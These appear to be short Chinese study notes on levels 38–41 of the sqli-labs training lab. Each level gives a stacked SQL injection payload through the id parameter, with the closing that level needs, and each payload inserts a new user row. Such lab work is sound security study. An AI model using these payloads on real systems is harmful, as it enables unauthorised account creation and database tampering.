less-38
可以正常做法,但源码中存在mysqli_multi_query函数,存在堆叠注入
?id=1';insert into users(id,username,password)values('100','100','100') -- qwe插入用户名密码
插入成功
less-39
与上题相似,闭合问题?id=1 ;insert into users(id,username,password)values('101','101','101') -- qwe
插入成功
less-40
类似,?id=1');insert into users(id,username,password)values('102','102','102') -- qwe
less-41
闭合问题?id=1;insert into users(id,username,password)values('103','103','103') -- qwe
